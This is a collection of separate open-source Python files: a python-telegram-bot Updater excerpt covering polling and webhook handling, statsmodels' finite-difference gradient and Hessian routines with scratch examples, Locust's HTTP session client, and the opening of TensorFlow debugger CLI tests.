:attr:`telegram.Bot.get_updates`.
read_latency (:obj:`float` | :obj:`int`, optional): Grace time in seconds for receiving
the reply from server. Will be added to the `timeout` value and used as the read
timeout from server (Default: 2).
network_delay: Deprecated. Will be honoured as :attr:`read_latency` for a while but
will be removed in the future.
Returns:
:obj:`Queue`: The update queue that can be filled from the main thread.
"""
if network_delay is not None:
warnings.warn('network_delay is deprecated, use read_latency instead')
read_latency = network_delay
with self.__lock:
if not self.running:
self.running = True
# Create & start threads
self.job_queue.start()
self._init_thread(self.dispatcher.start, "dispatcher")
self._init_thread(self._start_polling, "updater", poll_interval, timeout,
read_latency, bootstrap_retries, clean, allowed_updates)
# Return the update queue so the main thread can insert updates
return self.update_queue
def start_webhook(self,
listen='127.0.0.1',
port=80,
url_path='',
cert=None,
key=None,
clean=False,
bootstrap_retries=0,
webhook_url=None,
allowed_updates=None):
"""
Starts a small http server to listen for updates via webhook. If cert
and key are not provided, the webhook will be started directly on
http://listen:port/url_path, so SSL can be handled by another
application. Else, the webhook will be started on
https://listen:port/url_path
Args:
listen (:obj:`str`, optional): IP-Address to listen on. Default ``127.0.0.1``.
port (:obj:`int`, optional): Port the bot should be listening on. Default ``80``.
url_path (:obj:`str`, optional): Path inside url.
cert (:obj:`str`, optional): Path to the SSL certificate file.
key (:obj:`str`, optional): Path to the SSL key file.
clean (:obj:`bool`, optional): Whether to clean any pending updates on Telegram servers
before actually starting the webhook. Default is ``False``.
bootstrap_retries (:obj:`int`, optional): Whether the bootstrapping phase of the
`Updater` will retry on failures on the Telegram server.
* < 0 - retry indefinitely
* 0 - no retries (default)
* > 0 - retry up to X times
webhook_url (:obj:`str`, optional): Explicitly specify the webhook url. Useful behind
NAT, reverse proxy, etc. Default is derived from `listen`, `port` & `url_path`.
allowed_updates (List[:obj:`str`], optional): Passed to
:attr:`telegram.Bot.set_webhook`.
Returns:
:obj:`Queue`: The update queue that can be filled from the main thread.
"""
with self.__lock:
if not self.running:
self.running = True
# Create & start threads
self.job_queue.start()
self._init_thread(self.dispatcher.start, "dispatcher"),
self._init_thread(self._start_webhook, "updater", listen, port, url_path, cert,
key, bootstrap_retries, clean, webhook_url, allowed_updates)
# Return the update queue so the main thread can insert updates
return self.update_queue
def _start_polling(self, poll_interval, timeout, read_latency, bootstrap_retries, clean,
allowed_updates):
# """
# Thread target of thread 'updater'. Runs in background, pulls
# updates from Telegram and inserts them in the update queue of the
# Dispatcher.
# """
cur_interval = poll_interval
self.logger.debug('Updater thread started')
self._bootstrap(bootstrap_retries, clean=clean, webhook_url='', allowed_updates=None)
while self.running:
try:
updates = self.bot.get_updates(
self.last_update_id,
timeout=timeout,
read_latency=read_latency,
allowed_updates=allowed_updates)
except RetryAfter as e:
self.logger.info(str(e))
cur_interval = 0.5 + e.retry_after
except TelegramError as te:
self.logger.error("Error while getting Updates: {0}".format(te))
# Put the error into the update queue and let the Dispatcher
# broadcast it
self.update_queue.put(te)
cur_interval = self._increase_poll_interval(cur_interval)
else:
if not self.running:
if len(updates) > 0:
self.logger.debug('Updates ignored and will be pulled '
'again on restart.')
break
if updates:
for update in updates:
self.update_queue.put(update)
self.last_update_id = updates[-1].update_id + 1
cur_interval = poll_interval
sleep(cur_interval)
@staticmethod
def _increase_poll_interval(current_interval):
# increase waiting times on subsequent errors up to 30secs
if current_interval == 0:
current_interval = 1
elif current_interval < 30:
current_interval += current_interval / 2
elif current_interval > 30:
current_interval = 30
return current_interval
def _start_webhook(self, listen, port, url_path, cert, key, bootstrap_retries, clean,
webhook_url, allowed_updates):
self.logger.debug('Updater thread started')
use_ssl = cert is not None and key is not None
if not url_path.startswith('/'):
url_path = '/{0}'.format(url_path)
# Create and start server
self.httpd = WebhookServer((listen, port), WebhookHandler, self.update_queue, url_path,
self.bot)
if use_ssl:
self._check_ssl_cert(cert, key)
# DO NOT CHANGE: Only set webhook if SSL is handled by library
if not webhook_url:
webhook_url = self._gen_webhook_url(listen, port, url_path)
self._bootstrap(
max_retries=bootstrap_retries,
clean=clean,
webhook_url=webhook_url,
cert=open(cert, 'rb'),
allowed_updates=allowed_updates)
elif clean:
self.logger.warning("cleaning updates is not supported if "
"SSL-termination happens elsewhere; skipping")
self.httpd.serve_forever(poll_interval=1)
def _check_ssl_cert(self, cert, key):
# Check SSL-Certificate with openssl, if possible
try:
exit_code = subprocess.call(
["openssl", "x509", "-text", "-noout", "-in", cert],
stdout=open(os.devnull, 'wb'),
stderr=subprocess.STDOUT)
except OSError:
exit_code = 0
if exit_code is 0:
try:
self.httpd.socket = ssl.wrap_socket(
self.httpd.socket, certfile=cert, keyfile=key, server_side=True)
except ssl.SSLError as error:
self.logger.exception('Failed to init SSL socket')
raise TelegramError(str(error))
else:
raise TelegramError('SSL Certificate invalid')
@staticmethod
def _gen_webhook_url(listen, port, url_path):
return 'https://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)
def _bootstrap(self, max_retries, clean, webhook_url, allowed_updates, cert=None):
retries = 0
while 1:
try:
if clean:
# Disable webhook for cleaning
self.bot.delete_webhook()
self._clean_updates()
sleep(1)
self.bot.set_webhook(
url=webhook_url, certificate=cert, allowed_updates=allowed_updates)
except (Unauthorized, InvalidToken):
raise
except TelegramError:
msg = 'error in bootstrap phase; try={0} max_retries={1}'.format(retries,
max_retries)
if max_retries < 0 or retries < max_retries:
self.logger.warning(msg)
retries += 1
else:
self.logger.exception(msg)
raise
else:
break
sleep(1)
def _clean_updates(self):
self.logger.debug('Cleaning updates from Telegram server')
updates = self.bot.get_updates()
while updates:
updates = self.bot.get_updates(updates[-1].update_id + 1)
def stop(self):
"""Stops the polling/webhook thread, the dispatcher and the job queue."""
self.job_queue.stop()
with self.__lock:
if self.running or self.dispatcher.has_running_threads:
self.logger.debug('Stopping Updater and Dispatcher...')
self.running = False
self._stop_httpd()
self._stop_dispatcher()
self._join_threads()
# Stop the Request instance only if it was created by the Updater
if self._request:
self._request.stop()
def _stop_httpd(self):
if self.httpd:
self.logger.debug('Waiting for current webhook connection to be '
'closed... Send a Telegram message to the bot to exit '
'immediately.')
self.httpd.shutdown()
self.httpd = None
def _stop_dispatcher(self):
self.logger.debug('Requesting Dispatcher to stop...')
self.dispatcher.stop()
def _join_threads(self):
for thr in self.__threads:
self.logger.debug('Waiting for {0} thread to end'.format(thr.name))
thr.join()
self.logger.debug('{0} thread has ended'.format(thr.name))
self.__threads = []
def signal_handler(self, signum, frame):
self.is_idle = False
if self.running:
self.stop()
if self.user_sig_handler:
self.user_sig_handler(signum, frame)
else:
self.logger.warning('Exiting immediately!')
import os
os._exit(1)
def idle(self, stop_signals=(SIGINT, SIGTERM, SIGABRT)):
"""Blocks until one of the signals are received and stops the updater.
Args:
stop_signals (:obj:`iterable`): Iterable containing signals from the signal module that
should be subscribed to. Updater.stop() will be called on receiving one of those
signals. Defaults to (``SIGINT``, ``SIGTERM``, ``SIGABRT``).
"""
for sig in stop_signals:
signal(sig, self.signal_handler)
self.is_idle = True
while self.is_idle:
sleep(1)
| |
"""numerical differentiation function, gradient, Jacobian, and Hessian
Author : josef-pkt
License : BSD
Notes
-----
These are simple forward differentiation, so that we have them available
without dependencies.
* Jacobian should be faster than numdifftools because it doesn't use loop over
observations.
* numerical precision will vary and depend on the choice of stepsizes
"""
# TODO:
# * some cleanup
# * check numerical accuracy (and bugs) with numdifftools and analytical
# derivatives
# - linear least squares case: (hess - 2*X'X) is 1e-8 or so
# - gradient and Hessian agree with numdifftools when evaluated away from
# minimum
# - forward gradient, Jacobian evaluated at minimum is inaccurate, centered
# (+/- epsilon) is ok
# * dot product of Jacobian is different from Hessian, either wrong example or
# a bug (unlikely), or a real difference
#
#
# What are the conditions that Jacobian dotproduct and Hessian are the same?
#
# See also:
#
# BHHH: Greene p481 17.4.6, MLE Jacobian = d loglike / d beta , where loglike
# is vector for each observation
# see also example 17.4 when J'J is very different from Hessian
# also does it hold only at the minimum, what's relationship to covariance
# of Jacobian matrix
# http://projects.scipy.org/scipy/ticket/1157
# http://en.wikipedia.org/wiki/Levenberg%E2%80%93Marquardt_algorithm
# objective: sum((y-f(beta,x)**2), Jacobian = d f/d beta
# and not d objective/d beta as in MLE Greene
# similar: http://crsouza.blogspot.com/2009/11/neural-network-learning-by-levenberg_18.html#hessian
#
# in example: if J = d x*beta / d beta then J'J == X'X
# similar to http://en.wikipedia.org/wiki/Levenberg%E2%80%93Marquardt_algorithm
from __future__ import print_function
from statsmodels.compat.python import range
import numpy as np
# NOTE: we only do double precision internally so far
EPS = np.MachAr().eps
_hessian_docs = """
Calculate Hessian with finite difference derivative approximation
Parameters
----------
x : array_like
value at which function derivative is evaluated
f : function
function of one array f(x, `*args`, `**kwargs`)
epsilon : float or array-like, optional
Stepsize used, if None, then stepsize is automatically chosen
according to EPS**(1/%(scale)s)*x.
args : tuple
Arguments for function `f`.
kwargs : dict
Keyword arguments for function `f`.
%(extra_params)s
Returns
-------
hess : ndarray
array of partial second derivatives, Hessian
%(extra_returns)s
Notes
-----
Equation (%(equation_number)s) in Ridout. Computes the Hessian as::
%(equation)s
where e[j] is a vector with element j == 1 and the rest are zero and
d[i] is epsilon[i].
References
----------:
Ridout, M.S. (2009) Statistical applications of the complex-step method
of numerical differentiation. The American Statistician, 63, 66-74
"""
def _get_epsilon(x, s, epsilon, n):
if epsilon is None:
h = EPS**(1. / s) * np.maximum(np.abs(x), 0.1)
else:
if np.isscalar(epsilon):
h = np.empty(n)
h.fill(epsilon)
else: # pragma : no cover
h = np.asarray(epsilon)
if h.shape != x.shape:
raise ValueError("If h is not a scalar it must have the same"
" shape as x.")
return h
def approx_fprime(x, f, epsilon=None, args=(), kwargs={}, centered=False):
'''
Gradient of function, or Jacobian if function f returns 1d array
Parameters
----------
x : array
parameters at which the derivative is evaluated
f : function
`f(*((x,)+args), **kwargs)` returning either one value or 1d array
epsilon : float, optional
Stepsize, if None, optimal stepsize is used. This is EPS**(1/2)*x for
`centered` == False and EPS**(1/3)*x for `centered` == True.
args : tuple
Tuple of additional arguments for function `f`.
kwargs : dict
Dictionary of additional keyword arguments for function `f`.
centered : bool
Whether central difference should be returned. If not, does forward
differencing.
Returns
-------
grad : array
gradient or Jacobian
Notes
-----
If f returns a 1d array, it returns a Jacobian. If a 2d array is returned
by f (e.g., with a value for each observation), it returns a 3d array
with the Jacobian of each observation with shape xk x nobs x xk. I.e.,
the Jacobian of the first observation would be [:, 0, :]
'''
n = len(x)
# TODO: add scaled stepsize
f0 = f(*((x,)+args), **kwargs)
dim = np.atleast_1d(f0).shape # it could be a scalar
grad = np.zeros((n,) + dim, float)
ei = np.zeros((n,), float)
if not centered:
epsilon = _get_epsilon(x, 2, epsilon, n)
for k in range(n):
ei[k] = epsilon[k]
grad[k, :] = (f(*((x+ei,) + args), **kwargs) - f0)/epsilon[k]
ei[k] = 0.0
else:
epsilon = _get_epsilon(x, 3, epsilon, n) / 2.
for k in range(len(x)):
ei[k] = epsilon[k]
grad[k, :] = (f(*((x+ei,)+args), **kwargs) -
f(*((x-ei,)+args), **kwargs))/(2 * epsilon[k])
ei[k] = 0.0
return grad.squeeze().T
def approx_fprime_cs(x, f, epsilon=None, args=(), kwargs={}):
'''
Calculate gradient or Jacobian with complex step derivative approximation
Parameters
----------
x : array
parameters at which the derivative is evaluated
f : function
`f(*((x,)+args), **kwargs)` returning either one value or 1d array
epsilon : float, optional
Stepsize, if None, optimal stepsize is used. Optimal step-size is
EPS*x. See note.
args : tuple
Tuple of additional arguments for function `f`.
kwargs : dict
Dictionary of additional keyword arguments for function `f`.
Returns
-------
partials : ndarray
array of partial derivatives, Gradient or Jacobian
Notes
-----
The complex-step derivative has truncation error O(epsilon**2), so
truncation error can be eliminated by choosing epsilon to be very small.
The complex-step derivative avoids the problem of round-off error with
small epsilon because there is no subtraction.
'''
# From Guilherme P. de Freitas, numpy mailing list
# May 04 2010 thread "Improvement of performance"
# http://mail.scipy.org/pipermail/numpy-discussion/2010-May/050250.html
n = len(x)
epsilon = _get_epsilon(x, 1, epsilon, n)
increments = np.identity(n) * 1j * epsilon
# TODO: see if this can be vectorized, but usually dim is small
partials = [f(x+ih, *args, **kwargs).imag / epsilon[i]
for i, ih in enumerate(increments)]
return np.array(partials).T
def approx_hess_cs(x, f, epsilon=None, args=(), kwargs={}):
'''Calculate Hessian with complex-step derivative approximation
Parameters
----------
x : array_like
value at which function derivative is evaluated
f : function
function of one array f(x)
epsilon : float
stepsize, if None, then stepsize is automatically chosen
Returns
-------
hess : ndarray
array of partial second derivatives, Hessian
Notes
-----
based on equation 10 in
M. S. RIDOUT: Statistical Applications of the Complex-step Method
of Numerical Differentiation, University of Kent, Canterbury, Kent, U.K.
The stepsize is the same for the complex and the finite difference part.
'''
# TODO: might want to consider lowering the step for pure derivatives
n = len(x)
h = _get_epsilon(x, 3, epsilon, n)
ee = np.diag(h)
hess = np.outer(h, h)
n = len(x)
for i in range(n):
for j in range(i, n):
hess[i, j] = (f(*((x + 1j*ee[i, :] + ee[j, :],) + args), **kwargs)
- f(*((x + 1j*ee[i, :] - ee[j, :],)+args),
**kwargs)).imag/2./hess[i, j]
hess[j, i] = hess[i, j]
return hess
approx_hess_cs.__doc__ = (("Calculate Hessian with complex-step derivative "
"approximation\n") +
"\n".join(_hessian_docs.split("\n")[1:]) %
dict(scale="3", extra_params="",
extra_returns="", equation_number="10",
equation=("1/(2*d_j*d_k) * "
"imag(f(x + i*d[j]*e[j] + "
"d[k]*e[k]) -\n"
" "
"f(x + i*d[j]*e[j] - d[k]*e[k]))\n"))
)
def approx_hess1(x, f, epsilon=None, args=(), kwargs={}, return_grad=False):
n = len(x)
h = _get_epsilon(x, 3, epsilon, n)
ee = np.diag(h)
f0 = f(*((x,)+args), **kwargs)
# Compute forward step
g = np.zeros(n)
for i in range(n):
g[i] = f(*((x+ee[i, :],)+args), **kwargs)
hess = np.outer(h, h) # this is now epsilon**2
# Compute "double" forward step
for i in range(n):
for j in range(i, n):
hess[i, j] = (f(*((x + ee[i, :] + ee[j, :],) + args), **kwargs) -
g[i] - g[j] + f0)/hess[i, j]
hess[j, i] = hess[i, j]
if return_grad:
grad = (g - f0)/h
return hess, grad
else:
return hess
approx_hess1.__doc__ = _hessian_docs % dict(scale="3",
extra_params="""return_grad : bool
Whether or not to also return the gradient
""",
extra_returns="""grad : nparray
Gradient if return_grad == True
""",
equation_number="7",
equation="""1/(d_j*d_k) * ((f(x + d[j]*e[j] + d[k]*e[k]) - f(x + d[j]*e[j])))
""")
def approx_hess2(x, f, epsilon=None, args=(), kwargs={}, return_grad=False):
#
n = len(x)
# NOTE: ridout suggesting using eps**(1/4)*theta
h = _get_epsilon(x, 3, epsilon, n)
ee = np.diag(h)
f0 = f(*((x,)+args), **kwargs)
# Compute forward step
g = np.zeros(n)
gg = np.zeros(n)
for i in range(n):
g[i] = f(*((x+ee[i, :],)+args), **kwargs)
gg[i] = f(*((x-ee[i, :],)+args), **kwargs)
hess = np.outer(h, h) # this is now epsilon**2
# Compute "double" forward step
for i in range(n):
for j in range(i, n):
hess[i, j] = (f(*((x + ee[i, :] + ee[j, :],) + args), **kwargs) -
g[i] - g[j] + f0 +
f(*((x - ee[i, :] - ee[j, :],) + args), **kwargs) -
gg[i] - gg[j] + f0)/(2 * hess[i, j])
hess[j, i] = hess[i, j]
if return_grad:
grad = (g - f0)/h
return hess, grad
else:
return hess
approx_hess2.__doc__ = _hessian_docs % dict(scale="3",
extra_params="""return_grad : bool
Whether or not to also return the gradient
""",
extra_returns="""grad : nparray
Gradient if return_grad == True
""",
equation_number="8",
equation = """1/(2*d_j*d_k) * ((f(x + d[j]*e[j] + d[k]*e[k]) - f(x + d[j]*e[j])) -
(f(x + d[k]*e[k]) - f(x)) +
(f(x - d[j]*e[j] - d[k]*e[k]) - f(x + d[j]*e[j])) -
(f(x - d[k]*e[k]) - f(x)))
""")
def approx_hess3(x, f, epsilon=None, args=(), kwargs={}):
n = len(x)
h = _get_epsilon(x, 4, epsilon, n)
ee = np.diag(h)
hess = np.outer(h,h)
for i in range(n):
for j in range(i, n):
hess[i, j] = (f(*((x + ee[i, :] + ee[j, :],) + args), **kwargs)
- f(*((x + ee[i, :] - ee[j, :],) + args), **kwargs)
- (f(*((x - ee[i, :] + ee[j, :],) + args), **kwargs)
- f(*((x - ee[i, :] - ee[j, :],) + args), **kwargs),)
)/(4.*hess[i, j])
hess[j, i] = hess[i, j]
return hess
approx_hess3.__doc__ = _hessian_docs % dict(scale="4", extra_params="",
extra_returns="",
equation_number="9",
equation = """1/(4*d_j*d_k) * ((f(x + d[j]*e[j] + d[k]*e[k]) - f(x + d[j]*e[j]
- d[k]*e[k])) -
(f(x - d[j]*e[j] + d[k]*e[k]) - f(x - d[j]*e[j]
- d[k]*e[k]))""")
approx_hess = approx_hess3
approx_hess.__doc__ += "\n This is an alias for approx_hess3"
if __name__ == '__main__': #pragma : no cover
import statsmodels.api as sm
from scipy.optimize.optimize import approx_fhess_p
import numpy as np
data = sm.datasets.spector.load()
data.exog = sm.add_constant(data.exog, prepend=False)
mod = sm.Probit(data.endog, data.exog)
res = mod.fit(method="newton")
test_params = [1,0.25,1.4,-7]
llf = mod.loglike
score = mod.score
hess = mod.hessian
# below is Josef's scratch work
def approx_hess_cs_old(x, func, args=(), h=1.0e-20, epsilon=1e-6):
def grad(x):
return approx_fprime_cs(x, func, args=args, h=1.0e-20)
#Hessian from gradient:
return (approx_fprime(x, grad, epsilon)
+ approx_fprime(x, grad, -epsilon))/2.
def fun(beta, x):
return np.dot(x, beta).sum(0)
def fun1(beta, y, x):
#print(beta.shape, x.shape)
xb = np.dot(x, beta)
return (y-xb)**2 #(xb-xb.mean(0))**2
def fun2(beta, y, x):
#print(beta.shape, x.shape)
return fun1(beta, y, x).sum(0)
nobs = 200
x = np.arange(nobs*3).reshape(nobs,-1)
x = np.random.randn(nobs,3)
xk = np.array([1,2,3])
xk = np.array([1.,1.,1.])
#xk = np.zeros(3)
beta = xk
y = np.dot(x, beta) + 0.1*np.random.randn(nobs)
xk = np.dot(np.linalg.pinv(x),y)
epsilon = 1e-6
args = (y,x)
from scipy import optimize
xfmin = optimize.fmin(fun2, (0,0,0), args)
print(approx_fprime((1,2,3),fun,epsilon,x))
jac = approx_fprime(xk,fun1,epsilon,args)
jacmin = approx_fprime(xk,fun1,-epsilon,args)
#print(jac)
print(jac.sum(0))
print('\nnp.dot(jac.T, jac)')
print(np.dot(jac.T, jac))
print('\n2*np.dot(x.T, x)')
print(2*np.dot(x.T, x))
jac2 = (jac+jacmin)/2.
print(np.dot(jac2.T, jac2))
#he = approx_hess(xk,fun2,epsilon,*args)
print(approx_hess_old(xk,fun2,1e-3,args))
he = approx_hess_old(xk,fun2,None,args)
print('hessfd')
print(he)
print('epsilon =', None)
print(he[0] - 2*np.dot(x.T, x))
for eps in [1e-3,1e-4,1e-5,1e-6]:
print('eps =', eps)
print(approx_hess_old(xk,fun2,eps,args)[0] - 2*np.dot(x.T, x))
hcs2 = approx_hess_cs(xk,fun2,args=args)
print('hcs2')
print(hcs2 - 2*np.dot(x.T, x))
hfd3 = approx_hess(xk,fun2,args=args)
print('hfd3')
print(hfd3 - 2*np.dot(x.T, x))
import numdifftools as nd
hnd = nd.Hessian(lambda a: fun2(a, y, x))
hessnd = hnd(xk)
print('numdiff')
print(hessnd - 2*np.dot(x.T, x))
#assert_almost_equal(hessnd, he[0])
gnd = nd.Gradient(lambda a: fun2(a, y, x))
gradnd = gnd(xk)
| |
import re
import time
import requests
from requests import Request, Response
from requests.auth import HTTPBasicAuth
from requests.exceptions import InvalidSchema, InvalidURL, MissingSchema, RequestException
from urllib.parse import urlparse, urlunparse
from .exception import CatchResponseError, ResponseError
absolute_http_url_regexp = re.compile(r"^https?://", re.I)
class LocustResponse(Response):
def raise_for_status(self):
if hasattr(self, "error") and self.error:
raise self.error
Response.raise_for_status(self)
class HttpSession(requests.Session):
"""
Class for performing web requests and holding (session-) cookies between requests (in order
to be able to log in and out of websites). Each request is logged so that locust can display
statistics.
This is a slightly extended version of `python-request <http://python-requests.org>`_'s
:py:class:`requests.Session` class and mostly this class works exactly the same. However
the methods for making requests (get, post, delete, put, head, options, patch, request)
can now take a *url* argument that's only the path part of the URL, in which case the host
part of the URL will be prepended with the HttpSession.base_url which is normally inherited
from a User class' host property.
Each of the methods for making requests also takes two additional optional arguments which
are Locust specific and doesn't exist in python-requests. These are:
:param name: (optional) An argument that can be specified to use as label in Locust's statistics instead of the URL path.
This can be used to group different URL's that are requested into a single entry in Locust's statistics.
:param catch_response: (optional) Boolean argument that, if set, can be used to make a request return a context manager
to work as argument to a with statement. This will allow the request to be marked as a fail based on the content of the
response, even if the response code is ok (2xx). The opposite also works, one can use catch_response to catch a request
and then mark it as successful even if the response code was not (i.e 500 or 404).
"""
def __init__(self, base_url, request_success, request_failure, *args, **kwargs):
super().__init__(*args, **kwargs)
self.base_url = base_url
self.request_success = request_success
self.request_failure = request_failure
# Check for basic authentication
parsed_url = urlparse(self.base_url)
if parsed_url.username and parsed_url.password:
netloc = parsed_url.hostname
if parsed_url.port:
netloc += ":%d" % parsed_url.port
# remove username and password from the base_url
self.base_url = urlunparse(
(parsed_url.scheme, netloc, parsed_url.path, parsed_url.params, parsed_url.query, parsed_url.fragment)
)
# configure requests to use basic auth
self.auth = HTTPBasicAuth(parsed_url.username, parsed_url.password)
def _build_url(self, path):
""" prepend url with hostname unless it's already an absolute URL """
if absolute_http_url_regexp.match(path):
return path
else:
return "%s%s" % (self.base_url, path)
def request(self, method, url, name=None, catch_response=False, **kwargs):
"""
Constructs and sends a :py:class:`requests.Request`.
Returns :py:class:`requests.Response` object.
:param method: method for the new :class:`Request` object.
:param url: URL for the new :class:`Request` object.
:param name: (optional) An argument that can be specified to use as label in Locust's statistics instead of the URL path.
This can be used to group different URL's that are requested into a single entry in Locust's statistics.
:param catch_response: (optional) Boolean argument that, if set, can be used to make a request return a context manager
to work as argument to a with statement. This will allow the request to be marked as a fail based on the content of the
response, even if the response code is ok (2xx). The opposite also works, one can use catch_response to catch a request
and then mark it as successful even if the response code was not (i.e 500 or 404).
:param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`.
:param data: (optional) Dictionary or bytes to send in the body of the :class:`Request`.
:param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`.
:param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`.
:param files: (optional) Dictionary of ``'filename': file-like-objects`` for multipart encoding upload.
:param auth: (optional) Auth tuple or callable to enable Basic/Digest/Custom HTTP Auth.
:param timeout: (optional) How long in seconds to wait for the server to send data before giving up, as a float,
or a (`connect timeout, read timeout <user/advanced.html#timeouts>`_) tuple.
:type timeout: float or tuple
:param allow_redirects: (optional) Set to True by default.
:type allow_redirects: bool
:param proxies: (optional) Dictionary mapping protocol to the URL of the proxy.
:param stream: (optional) whether to immediately download the response content. Defaults to ``False``.
:param verify: (optional) if ``True``, the SSL cert will be verified. A CA_BUNDLE path can also be provided.
:param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair.
"""
# prepend url with hostname unless it's already an absolute URL
url = self._build_url(url)
# store meta data that is used when reporting the request to locust's statistics
request_meta = {}
# set up pre_request hook for attaching meta data to the request object
request_meta["method"] = method
request_meta["start_time"] = time.monotonic()
response = self._send_request_safe_mode(method, url, **kwargs)
# record the consumed time
request_meta["response_time"] = (time.monotonic() - request_meta["start_time"]) * 1000
request_meta["name"] = name or (response.history and response.history[0] or response).request.path_url
# get the length of the content, but if the argument stream is set to True, we take
# the size from the content-length header, in order to not trigger fetching of the body
if kwargs.get("stream", False):
request_meta["content_size"] = int(response.headers.get("content-length") or 0)
else:
request_meta["content_size"] = len(response.content or b"")
if catch_response:
response.locust_request_meta = request_meta
return ResponseContextManager(
response, request_success=self.request_success, request_failure=self.request_failure
)
else:
if name:
# Since we use the Exception message when grouping failures, in order to not get
# multiple failure entries for different URLs for the same name argument, we need
# to temporarily override the response.url attribute
orig_url = response.url
response.url = name
try:
response.raise_for_status()
except RequestException as e:
self.request_failure.fire(
request_type=request_meta["method"],
name=request_meta["name"],
response_time=request_meta["response_time"],
response_length=request_meta["content_size"],
exception=e,
)
else:
self.request_success.fire(
request_type=request_meta["method"],
name=request_meta["name"],
response_time=request_meta["response_time"],
response_length=request_meta["content_size"],
)
if name:
response.url = orig_url
return response
def _send_request_safe_mode(self, method, url, **kwargs):
"""
Send an HTTP request, and catch any exception that might occur due to connection problems.
Safe mode has been removed from requests 1.x.
"""
try:
return super().request(method, url, **kwargs)
except (MissingSchema, InvalidSchema, InvalidURL):
raise
except RequestException as e:
r = LocustResponse()
r.error = e
r.status_code = 0 # with this status_code, content returns None
r.request = Request(method, url).prepare()
return r
class ResponseContextManager(LocustResponse):
"""
A Response class that also acts as a context manager that provides the ability to manually
control if an HTTP request should be marked as successful or a failure in Locust's statistics
This class is a subclass of :py:class:`Response <requests.Response>` with two additional
methods: :py:meth:`success <locust.clients.ResponseContextManager.success>` and
:py:meth:`failure <locust.clients.ResponseContextManager.failure>`.
"""
_manual_result = None
def __init__(self, response, request_success, request_failure):
# copy data from response to this object
self.__dict__ = response.__dict__
self._request_success = request_success
self._request_failure = request_failure
def __enter__(self):
return self
def __exit__(self, exc, value, traceback):
if self._manual_result is not None:
if self._manual_result is True:
self._report_success()
elif isinstance(self._manual_result, Exception):
self._report_failure(self._manual_result)
# if the user has already manually marked this response as failure or success
# we can ignore the default behaviour of letting the response code determine the outcome
return exc is None
if exc:
if isinstance(value, ResponseError):
self._report_failure(value)
else:
# we want other unknown exceptions to be raised
return False
else:
try:
self.raise_for_status()
except requests.exceptions.RequestException as e:
self._report_failure(e)
else:
self._report_success()
return True
def _report_success(self):
self._request_success.fire(
request_type=self.locust_request_meta["method"],
name=self.locust_request_meta["name"],
response_time=self.locust_request_meta["response_time"],
response_length=self.locust_request_meta["content_size"],
)
def _report_failure(self, exc):
self._request_failure.fire(
request_type=self.locust_request_meta["method"],
name=self.locust_request_meta["name"],
response_time=self.locust_request_meta["response_time"],
response_length=self.locust_request_meta["content_size"],
exception=exc,
)
def success(self):
"""
Report the response as successful
Example::
with self.client.get("/does/not/exist", catch_response=True) as response:
if response.status_code == 404:
response.success()
"""
self._manual_result = True
def failure(self, exc):
"""
Report the response as a failure.
if exc is anything other than a python exception (like a string) it will
be wrapped inside a CatchResponseError.
Example::
with self.client.get("/", catch_response=True) as response:
if response.content == b"":
response.failure("No data")
"""
if not isinstance(exc, Exception):
exc = CatchResponseError(exc)
self._manual_result = exc
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Building Blocks of the TensorFlow Debugger CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import stat
import tempfile
import numpy as np
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
class CommandLineExitTest(test_util.TensorFlowTestCase):
def testConstructionWithoutToken(self):
exit_exc = debugger_cli_common.CommandLineExit()
self.assertTrue(isinstance(exit_exc, Exception))
def testConstructionWithToken(self):
exit_exc = debugger_cli_common.CommandLineExit(exit_token={"foo": "bar"})
self.assertTrue(isinstance(exit_exc, Exception))
self.assertEqual({"foo": "bar"}, exit_exc.exit_token)
class RichTextLinesTest(test_util.TensorFlowTestCase):
def testRichTextLinesConstructorComplete(self):
# Test RichTextLines constructor.
screen_output = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]},
annotations={0: "longer wavelength",
1: "shorter wavelength"})
self.assertEqual(2, len(screen_output.lines))
self.assertEqual(2, len(screen_output.font_attr_segs))
self.assertEqual(1, len(screen_output.font_attr_segs[0]))
self.assertEqual(1, len(screen_output.font_attr_segs[1]))
self.assertEqual(2, len(screen_output.annotations))
self.assertEqual(2, screen_output.num_lines())
def testRichTextLinesConstructorWithInvalidType(self):
with self.assertRaisesRegexp(ValueError, "Unexpected type in lines"):
debugger_cli_common.RichTextLines(123)
def testRichTextLinesConstructorWithString(self):
# Test constructing a RichTextLines object with a string, instead of a list
# of strings.
screen_output = debugger_cli_common.RichTextLines(
"Roses are red",
font_attr_segs={0: [(0, 5, "red")]},
annotations={0: "longer wavelength"})
self.assertEqual(1, len(screen_output.lines))
self.assertEqual(1, len(screen_output.font_attr_segs))
self.assertEqual(1, len(screen_output.font_attr_segs[0]))
self.assertEqual(1, len(screen_output.annotations))
def testRichLinesAppendRichLine(self):
rtl = debugger_cli_common.RichTextLines(
"Roses are red",
font_attr_segs={0: [(0, 5, "red")]})
rtl.append_rich_line(debugger_cli_common.RichLine("Violets are ") +
debugger_cli_common.RichLine("blue", "blue"))
self.assertEqual(2, len(rtl.lines))
self.assertEqual(2, len(rtl.font_attr_segs))
self.assertEqual(1, len(rtl.font_attr_segs[0]))
self.assertEqual(1, len(rtl.font_attr_segs[1]))
def testRichLineLenMethodWorks(self):
self.assertEqual(0, len(debugger_cli_common.RichLine()))
self.assertEqual(0, len(debugger_cli_common.RichLine("")))
self.assertEqual(1, len(debugger_cli_common.RichLine("x")))
self.assertEqual(6, len(debugger_cli_common.RichLine("x y z ", "blue")))
